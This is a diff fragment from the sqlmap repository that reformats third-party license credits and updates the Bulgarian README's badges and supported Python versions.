+* The `icmpsh` tool located under `extra/icmpsh/`.
  Copyright (C) 2010, Nico Leidecker, Bernardo Damele.
 ````
@@ -234,7 +229,7 @@ Library.
 # PSF
-* The Magic library located under thirdparty/magic/.
+* The `Magic` library located under `thirdparty/magic/`.
  Copyright (C) 2011, Adam Hupp.
 ````
@@ -279,9 +274,15 @@ be bound by the terms and conditions of this License Agreement.
 # MIT
-* The bottle web framework library located under thirdparty/bottle/.
+* The `bottle` web framework library located under `thirdparty/bottle/`.
  Copyright (C) 2012, Marcel Hellkamp.
-* The Termcolor library located under thirdparty/termcolor/.
+* The `identYwaf` library located under `thirdparty/identywaf/`.
  Copyright (C) 2019, Miroslav Stampar.
 * The `ordereddict` library located under `thirdparty/odict/`.
  Copyright (C) 2009, Raymond Hettinger.
 * The `six` Python 2 and 3 compatibility library located under `thirdparty/six/`.
  Copyright (C) 2010-2018, Benjamin Peterson.
 * The `Termcolor` library located under `thirdparty/termcolor/`.
  Copyright (C) 2008-2011, Volvox Development Team.
 ````
@@ -308,7 +309,7 @@ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
 # Public domain
-* The PyDes library located under thirdparty/pydes/.
+* The `PyDes` library located under `thirdparty/pydes/`.
   Copyleft 2009, Todd Whiteman.
-* The win_inet_pton library located under thirdparty/wininetpton/.
+* The `win_inet_pton` library located under `thirdparty/wininetpton/`.
   Copyleft 2014, Ryan Vennell.
--- a/doc/translations/README-bg-BG.md
+++ b/doc/translations/README-bg-BG.md
@@ -1,6 +1,6 @@
 # sqlmap
-[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![Лиценз](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
 sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система.
@@ -20,7 +20,7 @@ sqlmap e инструмент за тестване и проникване, с
    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmap работи самостоятелно с [Python](http://www.python.org/download/) версия **2.6.x** и **2.7.x** на всички платформи.
+sqlmap работи самостоятелно с [Python](http://www.python.org/download/) версия **2.6**, **2.7** и **3.x** на всички платформи.
 Използване
 ----
--- a/Show More
+++ b/Show More